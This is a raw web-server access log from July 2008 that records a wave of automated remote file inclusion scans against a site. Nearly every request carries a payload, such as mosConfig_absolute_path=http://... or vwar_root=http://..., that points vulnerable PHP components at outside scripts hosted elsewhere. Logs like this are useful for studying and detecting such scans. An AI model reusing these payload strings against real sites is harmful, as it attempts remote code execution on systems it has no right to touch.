207.213.245.1 - - [19/Jul/2008:10:44:34 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:44:36 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:44:36 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:44:39 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:44:40 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.98.78.150 - - [19/Jul/2008:10:44:41 -0700] "GET //myPHPCalendar/admin.php?cal_dir=http://www.euricolopes.net/portal/includes/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:44:41 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:10:44:42 -0700] "GET /logs/access_080110.log/errors.php?error=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:44:42 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:44:46 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:44:53 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:44:53 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:44:56 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:44:56 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:45:03 -0700] "GET /bikes/dteel/2008_02_07/ HTTP/1.0" 200 2521 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:45:04 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:45:05 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18481 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:08 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:09 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:16 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:20 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:26 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18503 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:28 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:33 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:10:45:38 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.101.71 - - [19/Jul/2008:10:45:38 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18491 "-" "libwww-perl/5.803" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:45:41 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:45:43 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18491 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:10:45:44 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [19/Jul/2008:10:45:55 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/willysahputra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
194.79.75.195 - - [19/Jul/2008:10:45:56 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/willysahputra/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:46:00 -0700] "GET /logs/access_080329.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:46:00 -0700] "GET //index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:46:00 -0700] "GET /logs//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:46:02 -0700] "GET /bikes/dteel/2008_02_08/ HTTP/1.0" 200 1116 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:46:03 -0700] "GET /logs/access_080329.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:46:03 -0700] "GET //index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:46:03 -0700] "GET /logs//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:46:13 -0700] "GET /logs/access_080329.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:46:14 -0700] "GET //index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:46:14 -0700] "GET /logs//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:46:15 -0700] "GET /logs/access_080329.log//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:46:15 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:46:15 -0700] "GET //ashnews.php?pathtoashnews=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:46:15 -0700] "GET //index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:46:15 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:46:16 -0700] "GET /logs//index2.php?option=com_log&Itemid=&mosConfig_absolute_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:46:21 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:46:22 -0700] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.57.119 - - [19/Jul/2008:10:46:24 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.214.57.119 - - [19/Jul/2008:10:46:24 -0700] "GET //extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:46:27 -0700] "GET /logs/access.log/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:10:46:29 -0700] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.22 - - [19/Jul/2008:10:46:33 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.15.10.22 - - [19/Jul/2008:10:46:33 -0700] "GET //extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:46:34 -0700] "GET //extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
205.234.252.183 - - [19/Jul/2008:10:46:34 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:38 -0700] "GET /logs/access_080110.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.102.100 - - [19/Jul/2008:10:46:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.100 - - [19/Jul/2008:10:46:38 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/marlinarika/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:38 -0700] "GET //components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:39 -0700] "GET /logs//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:39 -0700] "GET /logs/access_080110.log//components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:40 -0700] "GET /logs/access_080105.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:40 -0700] "GET //components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:40 -0700] "GET /logs//components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:46:40 -0700] "GET /logs/access_071229.log/scanhttp://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:41 -0700] "GET /logs/access_080105.log//components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:46:44 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:46:44 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:46:44 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:46:50 -0700] "GET //ashnews.php?pathtoashnews=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:46:52 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:53 -0700] "GET /logs/access_080110.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:53 -0700] "GET /logs/access_080110.log//components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:46:53 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:46:53 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:46:53 -0700] "GET /logs/access_080329.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:53 -0700] "GET //components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:54 -0700] "GET //components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:54 -0700] "GET /logs//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:54 -0700] "GET /logs//components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:54 -0700] "GET /logs/access_080105.log//components/minibb/index.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:10:46:54 -0700] "GET /logs/access_080105.log//components/com_minibb.php?http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:46:57 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18497 "-" "libwww-perl/5.65" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:46:58 -0700] "GET //extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:46:58 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:47:01 -0700] "GET /bikes/dteel/2008_02_15/ HTTP/1.0" 200 1118 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:47:03 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.178.228.12 - - [19/Jul/2008:10:47:03 -0700] "GET //extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:10:47:04 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:47:12 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Jul/2008:10:47:28 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:10:47:32 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.188.128 - - [19/Jul/2008:10:47:32 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pre.com.tw/tmp/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:47:41 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:10:47:42 -0700] "GET /logs/access_080315.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:47:43 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18473 "-" "libwww-perl/5.811" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:47:43 -0700] "GET //extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
66.226.64.33 - - [19/Jul/2008:10:47:43 -0700] "GET /logs//extras/ext_cats.php?dir_path=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:10:47:43 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:47:49 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:10:47:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:10:47:52 -0700] "GET /classes/core/language.php?rootdir=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.208.182.67 - - [19/Jul/2008:10:48:02 -0700] "GET /bikes/dteel/2008_02_16/ HTTP/1.0" 200 1680 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:48:15 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:10:48:17 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:48:18 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 200 18473 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:10:48:18 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:48:30 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.126.254.80 - - [19/Jul/2008:10:48:33 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.126.254.80 - - [19/Jul/2008:10:48:33 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:48:34 -0700] "GET /?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 18429 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.54.160 - - [19/Jul/2008:10:48:35 -0700] "GET /logs/access_080129.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://naparstki.pl/mediagallery/maint/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [19/Jul/2008:10:48:36 -0700] "GET /logs/?mosConfig_absolute_path=http://www.almacenes-si2.com/portal/bajo.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.79" "www.dmulk.com"
